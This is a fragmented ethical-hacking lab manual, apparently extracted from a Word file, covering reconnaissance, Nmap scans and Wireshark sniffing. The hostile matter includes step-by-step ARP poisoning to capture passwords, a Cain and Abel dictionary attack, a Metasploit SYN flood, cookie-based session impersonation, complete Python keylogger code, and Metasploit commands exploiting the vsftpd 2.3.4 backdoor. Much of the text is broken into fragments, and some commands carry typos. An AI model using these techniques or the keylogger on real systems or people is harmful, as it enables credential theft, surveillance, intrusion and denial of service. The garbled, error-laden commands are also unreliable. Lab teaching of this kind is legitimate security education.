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 NO.1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AIM : Use Google and Whois for Reconnaisasance.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who.is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Step1: Open the WHO.is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2: Enter the website name and hit the “Enter button”.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3: Show you information about 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www.prestashop.com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 NO.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2.1)  Use CryptTool to encrypt and decrypt passwords using RC4 algorithm.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2 : Using RC4.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Encryption using RC4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Decryption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2.2)  Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode wireless network passwords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Click  on HASH Calcuator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the password to convert into hash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Paste the value  into the field you have converted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e.g(MD5)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Right Click on the hash and select the dictionary attack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 right click on the file and select (Add to List) and then select the Wordlist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all the options and start the dictionary attack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NO.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3.1) Using TraceRoute, ping, ifconfig, netstat Command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1: Type tracert command and type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www.prestashop.com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HYPERLINK "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http://www.prestashop.com/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"press “Enter”.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2: Ping all the IP addresses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Netstat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3.2) Perform ARP Poisoning in Windows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2 : Select sniffer on the top.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3 : Next to folder icon click on icon name start/stop sniffer. Select device and click on ok.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4 : Click on “+” icon on the top. Click on ok.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5 : Shows the Connected host.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6 : Select Arp at bottom.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7 : Click on “+” icon at the top.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8 : Click on start/stop ARP icon on top.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9 : Poisoning the source.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10 : Go to any website on source ip address.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11 : Go to password option in the cain &amp; abel and see the visited site password.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NO.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AIM : Using Nmap scanner to perform port scanning of various forms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ACK, SYN, FIN, NULL, XMAS.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NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it is installed properly. Now type the below commands.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ACK -sA (TCP ACK scan)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never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.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Command: nmap -sA -T4 scanme.nmap.org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SYN (Stealth) Scan (-sS)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SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.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Command: nmap -p22,113,139 scanme.nmap.org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FIN Scan (-sF)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Sets just the TCP FIN bit.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Command: nmap -sF -T4 para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NULL Scan (-sN)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not set any bits (TCP flag header is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Command: nmap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 22 scanme.nmap.org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XMAS Scan (-sX)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Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.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Command: nmap -sX -T4 scanme.nmap.org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PRACTCAL NO.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5.1) Use WireShark sniffer to capture network traffic and analyze.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1: Install and open WireShark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2: Go to Capture tab and select Interface option.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3: In Capture interface, Select Local Area Connection and click on start.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4: The source, Destination and protocols of the packets in the LAN network are displayed.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5: Open a website in a new window and enter the user id and password. Register if needed.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6: Enter the credentials and then sign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7: The wireshark tool will keep recording the packets.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8: Select filter as http to make the search easier and click on apply.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9: Now stop the tool to stop recording.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10: Find the post methods for username and passwords.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11: U will see the email- id and password that you used to log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NEMESIS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Start virtual machine of kali linux and metasploit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Uname and pass for metasploit is "msdadmin"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Open command prompt in your windows machine and check the IP address by typing "ipconfig"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Now open kali linux and start terminal and ping your windows machine by typing command "ping IP ADDRESS"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Start metasploit by typing "msfcondole -q"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perform the following steps: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search SYNFLOOD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use auxiliary/doc/tcp/synflood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show options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set RHOST 192.168.2.192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set RPORT 135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exploit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Next step open wireshark and see the flooding packets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NO.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AIM: Simulate persistant Cross Site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1)Start Kali Linux in virtual box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2)Start mera spolid in virtual box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3)User and password for meta sploit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msfadmin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4)Identify the ip address of metasploit virtual machine by typing ifconfig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now enter IP address of meta spolid machine in address bar of firefox web browser of Kali machine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6) now you will get options so click on dvwa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7) user name for dvwa is admin and password is password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8) once you login in dvwa click on security change security level high to low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9) Now click access stored tag and perform the operation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Scripting attack.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NO.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AIM: Session impersonation using Firefox and Tamper Data add-on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A] Session Impersonation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Open FireFox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Go to Tools &gt; Addons &gt; Extension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Search and install EditThisCookie or Cookie Import/Export or any other Cookie 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Then Click on Cookie extension to get cookie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Open a Website and Login and then click on export cookie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Logout from the webpage once the cookie got exported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Paste the cookie in the tool which you have exported and click on green tick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you are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Tamper DATA add-on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Open FireFox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Go to Tools &gt; Addons &gt; Extension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Search and install Temper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a website for tempering data e.g(razorba)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any item to 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Click to add cart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Click on tool for tempering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Start tempering the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you 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NO.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Aim: - Create a simple keylogger using python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Code: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pynput.keyboard import Key, Listener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if no name it gets into an empty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log_dir = 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This is a basic logging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logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG, format='%(asctime)s:%(message)s:')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This is from the library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on_press(key):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logging.info(str(key))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This says, listener is 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Listener(on_press=on_press) as listener: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listener.join()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PRACTICAL NO.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AIM: Using Metasploit to exploit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Download and open metasploit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exploit to attack the host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the exploit and add the exploit to the victim’s PC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Start virtual machine of kali linux and metasploit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Uname and pass for metasploit is "msdadmin"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Open command prompt in your windows machine and check the IP address by typing "ipconfig"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Now open kali linux and start terminal and ping your windows machine by typing command "ping IP ADDRESS"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Start metasploit by typing "msfcondole -q"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perform the following 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nmap 192.168.2.160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nmap -SV 192.168.2.160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search vsftpd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use exploit/unix/ftp/vsftpd_234_backdoor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show options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set RHOST 192.168.2.160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set payload cmd/interact exploit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exploit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PRACTICAL -8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FINDING DATABASE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LIST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FINDING COLUMNS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restashop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prestashop.com/" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.prestashop.com/" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="styles.xml" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /></Relationships>
</file>